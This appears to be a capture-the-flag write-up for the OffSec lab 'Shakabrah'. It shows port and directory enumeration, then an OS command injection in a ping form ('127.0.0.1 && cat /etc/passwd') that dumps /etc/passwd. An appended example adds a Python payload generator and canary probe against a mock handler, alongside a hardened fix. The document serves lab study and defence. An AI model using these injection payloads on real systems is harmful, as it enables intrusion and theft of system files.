Nmap

Offsec - Shakabrah - Jun 17th, 2023


Enumeration

Target IP given is: [LAB_IP]

Got OpenVAS working just for fun via Docker. Only able to check the services and their versions for CVEs. No deep auto webapp vuln checking or exploitation from default scans.

Nmap

nmap -p- -sV -sC --open -T4 [LAB_IP] -oN shakabrah_nmap.txt

Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 16:57 GMT

Nmap scan report for [LAB_IP]

Host is up (0.053s latency).

Not shown: 65533 filtered tcp ports (no-response)

Some closed ports may be reported as filtered due to --defeat-rst-ratelimit

PORT   STATE SERVICE VERSION

22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   2048 [HASH_REDACTED] (RSA)

|   256 [HASH_REDACTED] (ECDSA)

|_  256 [HASH_REDACTED] (ED25519)

80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))

|_http-server-header: Apache/2.4.29 (Ubuntu)

|_http-title: Site doesn't have a title (text/html; charset=UTF-8).

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 167.03 seconds

## Dirbuster

Using /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

Starting OWASP DirBuster 1.0-RC1

Starting dir/file list based brute forcing

File found: /index.php - 200

Dir found: / - 200

Dir found: /icons/ - 403

Dir found: /icons/small/ - 403

Nothing of note

## Site

It's a ping connection tester

https://i.imgur.com/pI8h8AF.png

Maybe I can do command injection / RCE

Chaining a second command after the ping target with && (the output below confirms the file read, so the path must be /etc/passwd):

127.0.0.1 && cat /etc/passwd

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.

64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.027 ms

64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.022 ms

64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.037 ms

64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.028 ms

--- 127.0.0.1 ping statistics ---

4 packets transmitted, 4 received, 0% packet loss, time 3062ms

rtt min/avg/max/mdev = 0.022/0.028/0.037/0.007 ms

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
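Added example, not from the original notes: the injection works because the form value is dropped straight into a shell command line, and the page never shows index.php's source. The script below uses a constructed stand-in for that handler (unquoted concatenation into sh -c, with echo PING in place of the real ping binary so it runs offline), probes it with a random canary across the usual breakout separators, and contrasts it with a hardened handler that validates the target as a literal IP and passes it as its own argv element. The handler names and the canary scheme are assumptions for illustration.

```python
"""Canary-based probing of a ping form for OS command injection, plus the
hardened version of the sink.

Assumptions (not from the write-up): `vulnerable_handler` is a constructed
stand-in for the site's index.php, modelling shell_exec("ping -c 4 " . $ip);
`echo PING` replaces the real ping binary so everything runs offline.
"""
import ipaddress
import secrets
import subprocess

# Ways to end the ping argument and start a new command.  "||" only fires when
# the preceding command fails, so it is included to show a negative result.
SEPARATORS = ["&&", ";", "|", "||", "\n"]


def build_payloads(host, command):
    """Return {label: payload} for each breakout technique."""
    payloads = {sep: f"{host}{sep}{command}" for sep in SEPARATORS}
    payloads["$()"] = f"{host} $({command})"   # command substitution
    payloads["``"] = f"{host} `{command}`"     # legacy substitution
    return payloads


def vulnerable_handler(user_input):
    """Constructed stand-in for the vulnerable page: user input concatenated
    into a single string and handed to a shell."""
    proc = subprocess.run(["sh", "-c", "echo PING " + user_input],
                          capture_output=True, text=True)
    # stderr is included because a real ping would echo an unknown host name,
    # which is how the $() and backtick cases usually leak the canary.
    return proc.stdout + proc.stderr


def hardened_handler(user_input):
    """Same feature with the two fixes that close the hole: accept only a
    literal IP address, and run the binary via an argv list (no shell)."""
    try:
        target = str(ipaddress.ip_address(user_input.strip()))
    except ValueError:
        return "invalid address\n"
    # In production this is ["ping", "-c", "4", target]; echo keeps it offline.
    proc = subprocess.run(["echo", "PING", target],
                          capture_output=True, text=True)
    return proc.stdout


def probe(handler, host="127.0.0.1", token=None):
    """Send each payload through `handler`; True means the injected echo ran
    and its canary came back in the response."""
    token = token or "c" + secrets.token_hex(8)
    results = {}
    for label, payload in build_payloads(host, f"echo {token}").items():
        results[label] = token in handler(payload)
    return results


if __name__ == "__main__":
    for name, handler in (("vulnerable", vulnerable_handler),
                          ("hardened", hardened_handler)):
        print(name, probe(handler))
```

Run it and the vulnerable stand-in reports every separator except ||, which is exactly the behaviour to expect from a ping that succeeds; the hardened handler never returns the canary. Against a live target the same probe would be sent through the form's real parameter, whose name the page does not show.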